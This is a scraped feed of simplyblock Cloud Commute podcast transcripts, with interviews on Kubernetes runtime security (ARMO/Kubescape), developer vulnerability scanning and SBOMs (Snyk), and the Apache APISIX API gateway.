Oshrat Nir: Well, I spend a lot of time on subreddits of security people. These people are very unhappy. I mean, some of them are really great professionals that want to do a good job and they feel they’re being discounted. Again, there’s this problem where there are tools that they want to use, but the DevOps that the people that they serve them to don’t want to use. So there needs to be a conversation. Security is important. Ok, F16s runs on Kubernetes. Water plants, sewage plants, a lot of important infrastructure runs on Kubernetes. So securing Kubernetes is very important. Now, in order for that to happen, everybody needs to get on board with that. And the only way to get on board with that is to have that conversation and to say, ‘ok, this is what needs to be done. This is what we think you need to do it. Are you are you on board? And if not, how do we get you on board?’ And one of the ways to get you on board is ok, look, you can put this in the CICD pipeline, forget about it until it reminds you. You can scan a repository every time you pull for it or an image every time you pull it. You can you have a VSCode plugin or a GitHub action. And all of these things are in order to have that conversation and say, look, security is important, but we don’t want to distract you from things that you find important. And that’s a conversation that has to happen, has to happen all the time. Security doesn’t end.

Chris Engelbert: Right, right. Ok, last question. Any predictions or any thoughts on the future of security? Anything you see on the horizon that is upcoming or that needs to happen from your perspective?

Oshrat Nir: Runtime is upcoming. It’s like two years, even two years ago, what’s the thing? Nobody was talking about anything else except shift left security. You shift left. DevOps should to do it. We’re done. We shifted left. And we found that even if one thing gets through our shift left, our production workloads are in danger.So next thing on the menu is runtime security.

Chris Engelbert: It’s a beautiful last sentence.Very, very nice. Thank you for being here. It was a pleasure having you.And I hope we we’re going to see. I think we never met in person, which is which is really weird. But since we’re both in the Kubernetes space, there is a good chance we do. And I hope we really do. So thank you very much for being here.

Oshrat Nir: Thanks so much for having me, Chris.

Chris Engelbert: Great. For the audience next week, next episode. I hope you’re listening again. And thank you very much for being here as well. Thank you very much. See ya.

Key Takeaways

Oshrat Nir has been with ARMO for 1.5 years, bringing 5.5 years of experience in cloud native technologies. ARMO, the company behind Kubescape, specializes in open source-based CI/CD & Kubernetes security, allowing organizations to be fully compliant to frameworks like NSA or CIS, as well as secure from code to production.

The founders of ARMO built a great product that required installing an agent in a cluster, which was highly intrusive & resource intensive. It was around five years ahead of its time, according to Oshrat. After the NSA and CISA came with guidelines on Kubernetes, the founders built an open source misconfiguration scanner based on that framework, which was Kubescape.

Kubescape quickly gained popularity, amassing thousands of stars on GitHub and became accepted by the CNCF (Cloud Native Computing Foundation) as a sandbox project – the first misconfiguration scanner in the CNCF. They’re still growing & are aiming to get to incubation in 2024.

Currently they have 2 offerings; the ARMO platform, which is the enterprise offering, and Kubescape, which is open source.

Oshrat also speaks about Snyk, which focuses on application security from a top-down approach, identifying vulnerabilities during development to prevent issues before deployment. ARMO takes a bottom-up approach, starting from the infrastructure and working upward, “We kind of do bottom up and Snyk does top down, and we kind of meet at the application.”

Oshrat also mentions how they have started to leverage eBPF to improve their scanning without changing the applications or infrastructure, which will help their users, particularly to decrease alert fatigue and the number of false positives.

ARMO is also introducing cloud-native detection and response for runtime. Since using eBPF, they are able to integrate additional anomaly detections.

Oshrat also spoke about the importance of the usability of the processes, which is why they have configurable security controls where you can quiet down or configure alerts for a period of time so you can focus on what you need, which greatly increases the efficiency of your security work.

Oshrat underscores the need for dialogue and consensus between security and DevOps teams to prioritize security without overwhelming developers.

Looking ahead, Oshrat predicts that runtime security will be a critical focus, just as shift left security was in the past. ARMO has you covered already.

The post Continuous vulnerability scanning in production with Oshrat Nir from ARMO appeared first on simplyblock.

]]>
EP13: Continuous vulnerability scanning in production with Oshrat Nir from ARMO
Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk https://www.simplyblock.io/blog/automated-vulnerability-detection-throughout-your-pipeline-with-brian-vermeer-from-snyk-video/ Fri, 10 May 2024 12:12:16 +0000 https://www.simplyblock.io/?p=274 This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site . In this installment of podcast, we’re joined by Brian Vermeer ( Twitter/X , Personal Blog ) from Synk , a cybersecurity company providing tooling to detect common […]

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.

]]>
This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site .

In this installment of podcast, we’re joined by Brian Vermeer ( Twitter/X , Personal Blog ) from Synk , a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline, talks about the necessity of multi checks, the commonly found threads, and how important it is to rebuild images for every deployment, even if the code hasn’t changed.

EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That’s always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It’s not Synk. It’s actually it’s Snyk. Some people say Snyk, but I don’t like that. And the founder wants that it’s Snyk. And it’s actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: That’s always hard to talk about yourself, right? I’m Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I’ve been a long term Java developer, mostly back end developer for all sorts of jobs within the Netherlands. Java champion, very active in the community, specifically the Dutch community. So the Netherlands Java user group and adjacent Java user groups do some stuff in the virtual Java user group that we just relaunched. That I’ve tried to be active and I’m just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, what we do, first of all, we create security tooling for developers. So our mission is to make security an integrated thing within your development lifecycle. Like in most companies, it’s an afterthought. Like one security team trying to do a lot of things and we have something in the pipeline and that’s horrible because I don’t want to deal with that. If all tests are green, it’s fine. But what if we perceive it in such a way as, “Hey, catch it early from your local machine.” Just like you do with unit tests. Maybe that’s already a hard job creating unit tests, but hey, let’s say we’re all good at that. Why not perceive it in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that’s why we create tooling for all stages of your software development lifecycle. And what I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind that is we started as a software composite analysis tool and people just bring in libraries. They have no clue what they’re bringing in and what kind of implications come with that. So we can do tests on that. We can report of that. We can make reports of that. And you can make the decisions. So now at least you know what you’re getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won’t say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well that these machines also had an operating system. Right. So I’m not saying it’s getting worse, but developers get into more responsibility because let’s say we’re doing DevOps, whatever that may mean. I mean, ask 10 DevOps engineers. That’s nowadays a job. What DevOps is, you probably get a lot of questions about tooling and that, but apparently what we did is tearing down the wall between old fashioned developer creation and getting things to production. So the ops folks, so we’re now responsible as a team to do all of that. And now your container or your environment, your cluster, your code is all together in your Git repository. So it’s all code now. And the team creating it is responsible for it. So yes, it shifted the problem from being in separate teams now to all in one team that we need to create and maintain stuff. So I don’t, I don’t think we’re getting into worse problems. I think we’re, we’re shifting the problems and it’s getting easier to get into problems. That’s, that’s what I, yeah.

Chris Engelbert: Yeah. Okay. We’re, we’re broadened the scope of where you could potentially run into issues. So, so the way it works is that Snyk, I need to remember to say Snyk and not Synk because now it makes sense.

Brian Vermeer: I’m okay with however you call it. As long as you don’t say sync, I’m fine. That’s, then you’re actually messing up letters.

Chris Engelbert: Yeah, sync, sync is different. It’s, it’s not, it’s not awkward and it’s not Worcester. Anyway. So, so that means the, the tooling is actually looking into, I think the dependencies, built environment, whatever ends up in your Docker container or your container image. Let’s say that way, nobody’s using Docker anymore. And all those other things. So basically everything along the pipeline or the built pipeline, right?

Brian Vermeer: Yeah. You can say that actually we start at the custom code that you’re actually writing. So we’re doing static analysis on that as well. Might combine that with stuff that we know from your, let’s say all your dependencies that come in your dependencies, transitive dependencies, like, “hey, you bring in a spring boot starter that has a ton of implications on how many libraries come in.” Are these affected? Yes or no, et cetera, et cetera. That we go one layer deeper or around that, say your, your container images and let’s say it’s Docker because it’s still the most commonly used, but whatever, like any image is built on a base image and probably you streamlined some binaries in there. So what’s there, that’s another shell around the whole application. And then you get into, in the end, for instance, your configuration for your infrastructure is go to the bullet. That can go wrong by not having a security context or like some policies that are not bad or something like that. Some pods that you gave more privileges than you should have because, Hey, it works on my machine, right? Let’s ship it. These kinds of things. So on all these four fronts, we try to provide pooling and test capabilities in such a way that you can choose how you want to utilize these test capabilities, either in a CI pipeline or our local machine or in between or part of your build, whatever fits your needs. And instead of, Hey, this needs to be part of your build pipeline, because that’s how the tool works. And I was a developer myself for back end for backend jobs a long time. And I was the person that was like, if we need to satisfy that tool, I will find a way around it.

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose because, because at that point you’re only like checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah. That makes a lot of sense. So that means when you, say you start at a code level, I think simple, like the still most common thing, like SQL injection issues, all that kind of stuff, that is probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path of virtual injections, cross-site scripting, all these kinds of things will get notified and we will, if possible, we will give you remediation advice on that. And then we go levels deeper. So it’s actually like, you can almost say it’s like four different types of scanner that you can use in whatever way you want. Some people are like, no, I’m just only using the dependency analysis stuff. That’s also fine. Like it’s just four different capabilities for basically four levels in your, in your application, because it’s no longer just your binary that you put in. It’s more than that, as we just discussed.

Chris Engelbert: So, when we look at like the recent and not so recent past, I mean, we’re both coming from the Java world. You said you’re also, you were a Java programmer for a long time. I am. I think the, I mean, the Java world isn’t necessarily known for like the massive CVEs. except Log4Shell.

Brian Vermeer: Yeah, that was a big,

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is in the Java world, it’s either not so big or very big. There’s no in between, or at least it doesn’t get the amount of attention, but yeah, Log4Shell was a big one because first of all, props to the folks that maintain that, because I think there were only three active maintainers at that point when the thing came out and it’s a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at you doing a bad job. It was just three guys that voluntarily maintained it.

Chris Engelbert: So for the people that do not know what Log4Shell was. So Log4J is one of the most common logging frameworks in Java. And there was a way to inject remote code and execute it with basically whatever permission your process had. And as you said, a lot of people love to run their containers with root privileges. So there is your problem right there. But yeah, so Log4Shell was, I think, at least from what I can remember, probably like the biggest CVE in the Java world, ever since I joined.

Brian Vermeer: Maybe that one, but we had in 2017, we had the Apache struts, one that blew, blew, blew away, blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I’m not talking about struts because that was like so long deprecated by that point of time. It was, it was, it was … They deserved it. No, but seriously, yeah. True, true. The struts one was also pretty big, but since we are just recording it, this on April 3rd, there was just like a very, very interesting thing that was like two days ago, three days ago, like April 1st. I think it was actually April 1st, because I initially thought it’s an April’s Fool joke, but it was unfortunately not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it like April 1st. To be honest, initially I thought, okay, that’s a really bad April’s Fool. So what we’re talking about is the XZ issue. Maybe you want to say a few words about that or what?

Brian Vermeer: Well, let’s keep it simple. The XZ issue is basically an issue in one of the tools that come with some Linux distributions. And long story short, I’m not sure if they already created exploits on that. I didn’t, I didn’t actually try it because we’ve got folks that are doing the research. But apparently there, because of that tool, you could do nasty stuff such as arbitrary code executions or, or things with going into secure connections. At least it comes with your operating system. So that means if you have a Docker image or whatever image and you’re based on a certain well-known Linux distribution, you might be infected, regardless of whatever your application does. And it’s a big one. If you want to go deeper, there are tons of blogs of people that can explain to you what the actual problem was. But I think for the general developers, like, don’t shut your eyes and like, it’s not on my machine. It might be in your container because you’re using an outdated, now outdated image.

Chris Engelbert: I think there’s two things. First of all, I think it was found before it actually made it into any distribution, which is good. So if you’re, if you’re not using any of the like self-built distributions, you’re probably good. But what I found more interesting about it, that this backdoor was introduced from a person that was working on the tool for quite a while, like over a year or so, basically getting the trust of the actual maintainers and just sneaking stuff in eventually. And that is… That is why I think tools like Snyk or let’s, let’s be blunt, some of the competitors are so important, right? Because it’s, it’s really hard to just follow all of the new CVEs and sometimes they’re not blowing up this big. So you probably don’t even hear about them, but for that reason, it’s really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team, it is a side effect for you, like you’re building stuff and you don’t focus on checking manually, whatever is coming in and if it’s vulnerable or not, but you should be aware of these kinds of things. And so if they come in, you can make appropriate choices. I’m not saying you have to fix it. That’s up to you, like, and your threat level and whatever is going on in your company, but you need to be able to make these decisions based on accurate knowledge and have the appropriate knowledge that you can actually make such a decision. And yeah, you don’t want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for it, for your security risk.

Chris Engelbert: Right. And from your own feeling, like, in the past, we mostly deployed like on-prem installations or in like private clouds, but with the shift to public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. I think the short story, the short thing is, yes, there are more things that we have under our control as a development team. We do not always have the necessary specialties within the team. So we’re doing the best we can, but that means we’ve got multiple attack phases. Like your connection with your application is one thing, but this one is if I can get into your container for some reason, I can use this, even though at some, some things in containers or some things in operating systems might not be directly usable, but part of a chain that causes a problem. So I can get in in one, like if there’s one hole, I could get in and use certain objects or certain binaries in my chain of attacks and make it a domino effect, basically. So you’re, you’re giving people more and more ammunition. So, and as we automate certain things, we do not always have the necessary knowledge about certain things that might become bigger and bigger. Plus the fast pace we’re currently moving. Like, like tell me like 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day, like 10 years ago, we’re probably deploying once a month, you have time to test or something like that. So it’s a combination of doing all within one team, which yes, we should do, but also the fast pace that we need to release nowadays is something like, okay, we’re just doing it. The whole continuous development and continuous deployment is part of this. If you’re actually doing that, of course.

Chris Engelbert: Yeah, that’s, that’s true. I think it would have been like about every two weeks or so. But yeah, you normally had like one week development, one week bug fixing and testing, and then you deployed it. Now it’s like, you do something, you think it’s ready, it runs through the pipeline. And in the best case, it gets deployed immediately. And if something breaks, you gonna fix it. Or are you in the worst case, you roll back if it’s really bad.

Brian Vermeer: But on the other end, say you’re an application developer, and you need to do that stuff in a container. And do you ship it? Are you touching your container if you or rebuild your container if your application didn’t change?

Chris Engelbert: Yes.

Brian Vermeer: Probably, probably, probably a lot of folks won’t, because hey, did some, some things didn’t change, but it can be that the image your base your stuff upon or your base image or however you may manage that can be company wide, or you just will something out of Docker hub or whatever. That’s another layer that might have changed and might have been fixed or might have been vulnerabilities found in it. So it’s not anymore like, ‘hey, I didn’t touch that application. So I don’t have to rebuild.’ Yes, you should because other layers in that whole application changed.

Chris Engelbert: Right, right. And I think you brought up an important other factor. It might be that meanwhile, like, during the last we were in between the last deployment, and now a CVE has been found or something else, right? So you want to make sure you’re going to test it again. And then you have other programming languages, I’m not naming things here. But you might get a different version of the dependency, which is slightly newer. You’re doing a new install, right? And, and all of that are there’s so many different things, applications, these days, even micro services are so complex, because they normally need like, so many different dependencies. And it is hard to keep an eye on that. And that kind of brings me to the next question, like, how does snake play into something like SBOM or the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Now, it’s not, it’s not just the hype train. I mean, it’s a serious thing. For folks that don’t know, you can compare the SBOM as your ingredients nutrition list for whatever you try to consume to stuff in your face. Basically, what’s in there, you have no clue, the nutrition facts on the package should say what’s in it, right? So that’s how you should perceive an SBOM. If you create an artifact, then you should create a suitable SBOM with it that basically says, ‘okay, I’m using these dependencies and these transitive dependencies, and maybe even these Docker containers or whatever, I’m using these things to create my artifact.’ And a consumer of that artifact is then able to search around that like say a CVE comes up, a new Log4Shell comes up, let’s make it big. Am I infected? That’s the first question, a consumer or somebody that uses your artifact says. And with an SBOM, you have a standardized, well, there are three standards, but nevertheless, like multiple standard, but there’s a standardized way of having that and make it at least machine searchable to see if you are vulnerable or not. So how do we play into that? Yes, you can use our sneak tooling to create SBOMs for your applications or for your containers, that’s possible. We have the capabilities to read SBOMs in to see if these SBOMs contain packages or artifacts or stuff that have known vulnerabilities. So you can again, take the appropriate measures. I think it’s, yes, SBOM is great from the consumer side. So it’s very clear what that stuff that I got from the internet or got from a supplier, because we’re talking about supply chain all the time, from a supplier within stuff that I build upon or that I’m using that I can see if it contains problems or it contains potential problems when something new comes up. And yes, we have capabilities of creating these SBOMs and scanning these SBOMs.

Chris Engelbert: All right. We’re basically out of time. But there’s one more question I still want to ask. And how do you or where do you personally see the biggest trend could be related to Snyk to security in general?

Brian Vermeer: The biggest trend is the hype of AI nowadays. And that is definitely a thing. What people think is that AI is a suitable replacement for a security engineer. Yeah, I exaggerate now, but that’s not because we have demos where we let a code assistant tool, a well known code assistant tool, spit out vulnerable code, for instance. So I think the trend is two things, the whole supply chain, software supply chain, whatever you get into, you should look at one thing. But the other tool is that if people are using AI, don’t trust it blindly. And I think it’s that’s for everything for both stuff in your supply chain, as in generated code by a code assistant. You should know what you’re doing. Like it’s a great tool. But don’t trust it blindly, because it can also hallucinate and bring in stuff that you didn’t expect if you are not aware of what you’re doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

Brian Vermeer: Oh, definitely, definitely. It’s a lot of fun to play with it. It’s also a great tool. But you should know it doesn’t first of all, it doesn’t replace developers that think. Like thinking is still something an AI doesn’t do.

Chris Engelbert: All right. Thank you very much. Time is over. 20 minutes is always super, super short, but it’s supposed to be that way. So Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk because I haven’t looked into it for a couple of years now. So yeah, thank you very much. And for the audience, I hope you’re listening next week. New guest, new show episode, and we’re going to see you again.

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.

]]>
EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk
Improve Security with API Gateways, Nicolas Fränkel https://www.simplyblock.io/blog/how-api-gateways-help-to-improve-your-security-with-nicolas-frankel-from-api7-ai-video/ Fri, 19 Apr 2024 12:13:28 +0000 https://www.simplyblock.io/?p=287 In this installment of the podcast, we talked to Nicolas Fränkel (X/Twitter) from API7.ai, the creator of Apache APISIX, a high-performance open-source API gateway, discusses the significance of choosing tools that fit your needs, and emphasizes making choices based on what works best for your requirements. This interview is part of the simplyblock Cloud Commute […]

The post Improve Security with API Gateways, Nicolas Fränkel appeared first on simplyblock.

]]>
In this installment of the podcast, we talked to Nicolas Fränkel (X/Twitter) from API7.ai, the creator of Apache APISIX, a high-performance open-source API gateway, discusses the significance of choosing tools that fit your needs, and emphasizes making choices based on what works best for your requirements.

This interview is part of the simplyblock Cloud Commute Podcast, available on Youtube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

undefined

Chris Engelbert: Hello, everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast, your weekly 20-minute podcast show about cloud, cloud security, cloud storage, cloud Kubernetes. Today I have Nicolas with me, Nicolas Frankel. I think it’s a German last name, right?

Nicolas Fränkel: It’s a German last name. I’m French, and it’s spoken mostly by English speaking, so I don’t care anymore.

Chris Engelbert: All right, fair enough. You can jump right into that. Tell us a little bit about you, where you’re from, why you have a German last name, and being French, and everything else.

Nicolas Fränkel: I’m Nicolas Frankel. Yeah, I’m French. I was born in France. For a long time, I was a consultant in different roles, developer, architects, cloud architect, solution architect, whatever. I worked in projects with crazy deadlines, sometimes stupid management, changing requirements and stuff. And so I got very dissatisfied with it, and since a couple of years now I’m doing developer advocacy.

Chris Engelbert: Right, right. And we know each other from the Java world, so you’ve been a lot around the Java community for a long, long while.

Nicolas Fränkel: Yeah, I think we first met at conferences. I don’t remember which one, because it was quite long ago, but my main focus at the time was Java and the JVM.

Chris Engelbert: I think the first time was actually still JavaOne or something. So people that know a little bit of the Java space and remember JavaOne, you can guess how long this must be, or how far this must be ago. Right, so right now you’re working for a company called API7.

Nicolas Fränkel: So API7 is a company that is working on the Apache APISIX. Yeah, I agree. That’s funny. That was probably designed by engineers with no billboard marketing, but it’s still good, because 7 is better than 6, right? So Apache APISIX is an API gateway, and it’s an Apache project, obviously.

Chris Engelbert: All right, so you mentioned APISIX, and you obviously have the merch on you. So API7 is like the Python version, right? It’s one-based. APISIX is the zero-based version. We can argue which one is better.

Nicolas Fränkel: it’s a bit more complicated. So API7 is the company. All right. APISIX is the Apache projects, but API7 also has an offering called API7. So either you have an API7 on-premise version or an API7 cloud version. Yet you can think about it just like Confluent and Kafka. Of course, again, API7, APISIX, it’s a bit confusing. But just forget about the numbering. It’s just Confluent and Kafka. Confluent contributes on Kafka, but still they have their own offering. They do support on their own products, and they also have an on-premise and cloud version.

Chris Engelbert: All right, so that means that API7 as a company basically has probably the majority of engineers working on APISIX, which itself is a project in the Apache Foundation, right?

Nicolas Fränkel: I wouldn’t say they have the majority. To be honest, I didn’t check. But regarding the Apache Foundation, in order for a project to be promoted to top level, you must uphold a certain number of conditions. So the process goes like this. You go to the Apache Foundation, you give the project, and then you become part of the incubator. And in order to be promoted, you need to, as I mentioned, uphold a certain number of conditions that I didn’t check. But one of them is you must have enough committers from different companies. In order for one company not to be the only driving force behind the product, which in my opinion is a good thing. Whereas the CNCF, the project is managed by a company or different companies. In the Apache Foundation, the granularity is the contributor. So a contributor can afterwards, of course, change company or whatever. But in order to actually graduate from the incubator, you must have a certain number of people from different companies.

Chris Engelbert: Yeah, Ok. That makes sense. It’s supposed to be more of a community thing. I think that is the big thing with the Apache Foundation.

Nicolas Fränkel: That’s the whole point.

Chris Engelbert: Also, I think also in comparison or in difference from the Eclipse Foundation, where a lot of the projects are basically company driven.

Nicolas Fränkel: I don’t know about Eclipse. I know about this CNCF. I heard that in order to give your projects to the CNCF, you need to pay them money, which is a bit weird. Again, I didn’t proof-check that. But it’s company driven. You talk to companies. CNCF talk to companies. Whereas the Apache Foundation talk to people.

Chris Engelbert: Yeah, OK. Fair enough. All right. Let’s see. You said it’s an API gateway. So for the people that have not used an API gateway and have no idea what that means– and I think APISIX is a little bit more than just a standard gateway. So maybe can you elaborate a little bit?

Nicolas Fränkel: You can think about an API gateway as a reverse proxy on steroids that allows you to do stuff that is focused on APIs. I always use the same example of rate limiting. Rate limiting has been a feature of any reverse proxy since the 80s, because you want to protect your information system from distributed denial of service attacks. The thing is, it works very well. But then you need to consider every one of your clients the same. So you rate limit them exactly the same. Now imagine you are providing APIs. Probably there is a huge chance that you will want to give some offerings so that a couple of customers can get a higher limit than others. And it means that you can do that in a reverse proxy probably, but you would need to now add business logic into the reverse proxy. And as I mentioned, reverse proxy were designed at a time where they were completely, purely technical. They don’t like business logic so much. Nothing would prevent you from creating a C module and put it in NGINX and do that. But then you have or you encounter a couple of issues.

The first one is the open source version of NGINX. If you need to change the configuration, you need to switch it off and on again. If it sits at the entrance of your information system, it’s not great. And now the business logic might change every now and then and probably quite often, meaning it’s not great. That’s why those technical components, in general, they are not happy about business logic. You want to move the business logic away from those components. API gateways in my definition, because we will find plenty of definitions, first, you need to change the configuration dynamically. You don’t need to switch it then off and on again. And although you still don’t want to have too much business logic, it’s not unfriendly to business logic, meaning you can, for example, in Apache APISIX, you would create your plugin in Lua, and then you can change the Lua code. And then it’s fine.

Chris Engelbert: Right. Ok, so APISIX also uses Lua. I think that seems to be pretty much stable along a lot of the implementations.

Nicolas Fränkel: Not really. I mean, regarding the architecture, it’s based on NGINX. But as I mentioned, NGINX is not great for that. So on top of that, you have something called OpenResty. And OpenResty is actually Lua code that allows you to change the configuration of NGINX dynamically. The thing is, the configuration of OpenResty itself maps only one-to-one to the configuration of NGINX. So if you are doing it at scale, it’s not the best maintainability ever. So Apache APISIX provides you with abstractions. So what is an upstream? What is a route? Then you can reuse an upstream across several routes. What is a service? And everything is plugin-based. So it’s easy for routes to add a plugin, to remove a plugin, to change the configuration of plugin, and so on and so forth.

Chris Engelbert: Right, So from an applications perspective, or application developer’s perspective, do I need to be aware of that? Or does that all happen transparently to me?

Nicolas Fränkel: That’s the thing. It’s an infrastructure component. So normally, you shouldn’t care about it. You mostly don’t care about it. Even better, in general, a lot of stuff that you would do with frameworks or libraries like Spring or whatever, you can remove them from every individual app that you create and put them in these entry points at a very specific place. So your applications itself don’t need to protect the DDoS because the API gateway will do it for you. And you can also have authentication, authorization, caching, whatever. You can mostly move all those features away from your app, focus on your business logic, and just use the plugins that you need.

Chris Engelbert: Right, so you mentioned authentication. So I think it will hand me a JWT token or whatever kind of thing.

Nicolas Fränkel: For that we have multiple plugins. So yes, we have a JWT token. We have a Keycloak integration with a plugin. We have OpenID Connect. We have lots and lots of plugins. And if it’s plugin-based, then nothing prevents you from creating your own plugin. So either to interface with one of your own proprietary authentication systems, or if there is something that you want that is still generic, and then you can always contribute it back to the Apache Foundation, and then it becomes part of the products. And I mean, that’s the beauty of open source.

Chris Engelbert: Yeah, I agree. And I mean, we know each other for a long time. You know that I’m a big fan of open source for exactly all those reasons. Also from a company perspective, like a backing company, like in this case, API7, I think it makes a lot of sense. Because you get– I don’t want to say free help, but you get people that love your project, your product, and that are willing and happy to contribute as well.

Nicolas Fränkel: Exactly. I mean, we both worked for Hazelcast, although at different periods. And that was open source. But for me, this is the next step. The product is not only open source, and open source right at the moment is very interesting moment, because some companies are afraid that your product will be shrink-wrapped by the cloud provider, and they switch to an open license, which is not truly open source according to the creo. But the Apache Foundation is fully open source. So even if, for whatever reason, API7 decides not to work on the project anymore, then you can still have the project somewhere. And if you find a couple of maintainers, it means it’s still maintained.

Chris Engelbert: So from a deployment perspective, I guess I deploy that into Kubernetes, or?

Nicolas Fränkel: That’s the thing. It’s not focused on Kubernetes. So you can deploy that in any cloud provider, or even directly on the machine you choose. You have basically two modes. The first mode is the one that you would like to play with at first. So you deploy your nodes, and then you deploy etcd. So the same one used by Kubernetes to store its configuration. It’s a key-value distributed store. And then you can change the configuration of APISIX through an API call itself, and it will store its configuration in etcd. And then it’s very dynamic. If you have more maturity in GitOps, if you have more maturity in DevOps in general, perhaps you will notice that, oh, now where is my configuration? Well, in etcd. But now I need to back it up. How do I migrate? I need to move the data from etcd to another cluster. So it’s perhaps not the best production-grade way. So another way is to have everything static in YAML file. I hate YAML.

But at the moment, everybody is using YAML, and that’s the configuration. Like, at least Ops understand how to operate that. And so you have every node as its own set of YAML file, and then those YAML files are synchronized for GitOps to a GitHub repository. And then the GitHub repository is the source of truth, and it can be read, it can be audited, it can be whatever. Whereas if you store everything in etcd, it still works the same way, but it’s opaque. You don’t know what happens, right?

Chris Engelbert: I mean, the last thing you said with the GitHub repository being basically infrastructure as code, source of truth, that would probably then play into something like ArgoCD to deploy the updated version.

Nicolas Fränkel: Right, Ok. That makes sense. We don’t enforce any products. And actually, we just provide a way to statically configure Apache APISIX, and then you use whatever product you want. We are not partisan. We just allow you to do it.

Chris Engelbert: So from your own feeling, what do you think is the most common use case why people would use API gateways? Is that, as you said, rate limiting? I can see that as a very common thing, not only for companies like X or Twitter or whatever you want to call those these days, but also GitHub. I think every meaningful API has some kind of a rate limit. But I could also see DDoS attack, whereas I think people would probably use Cloudflare or any of these providers. What do you think is the biggest typical use case for that?

Nicolas Fränkel: If you are using APIs, you probably need something more than just a traditional reverse proxy. If you are using a reverse proxy, you are happy with your reverse proxy. You didn’t hit any limits of your reverse proxy. Just keep using your reverse proxy. As I mentioned, once you start to delve your feet into the API world, you will notice the reverse proxy is as the features are. It has some of the features that you want, but perhaps not the ease or the flexibility of configuration that you want. That said, you want to consider different clients in different ways. In that case, that’s probably the time where you need to think about, Ok, I need to think about migrating to an API gateway.

But context are so different that it’s very hard to provide a simple solution that caters to everybody’s need. But you could have a reverse proxy at the entrance of your whole information system. And at the second level, you would have the API gateway. Or you could have an API gateway for each different, I don’t know, domain of your organization, because your organization has different teams for every domain. And then, though it would be possible to have one gateway that is managed by different teams, then it makes a lot of sense to have different teams managing all their own configuration on their own component. But it’s like one micro-service. So everybody manages their own stuff. And you are sure that nobody will step on each other’s foot. But again, it depends a lot on the size, on how well you’re organized, on the maturity, on many different things. There are as many architectures as probably organizations.

Chris Engelbert: Just quickly, hinting back at Kubernetes, I think when– and I may be wrong here. If I use APISIX, I do not need any other ingress system, because APISIX can be the ingress provider for Kubernetes, doesn’t it?

Nicolas Fränkel: So getting back to Kubernetes, yes, we have an ingress controller. Or we have a hand chart. You can install APISIX inside your Kubernetes cluster. And it will serve as an ingress controller. So you will have the ingress controller itself. And it will configure Apache APISIX according to your manifests.

Chris Engelbert: All right, cool. So just looking at the time. Yeah, 20 minutes is not a lot. So when I want to use APISIX, should I call you guys at API7 Or should I go with the Apache project? Or should I do something else.

Nicolas Fränkel: It depends. I would always encourage people, if you are a tech person, to just take the project, use the Docker container, for example, try to play with it, try to change if it’s exactly what you need, try to understand the limits and the benefits in your own organization. Then if you’ve got questions, we’ve got a Slack that I can send you the reference, and then you can start to ask questions like, “Why in this case I tried to do that, and it works like this, and I wanted it to do that?” Then when you think that Apache APISIX is the right solution, then check if the open source version is enough. I believe if you are managing, if you are running a company, you will need to have some kind of support at some points. Up until that point, of course, just use the open source version, be happy with it. If you want to use it in a production-grade environment with support, with guarantees, and stuff, of course, please call us. It also pays my salary, so it’s also great. You’re welcome to play with the open source version and to check if it suits your requirements.

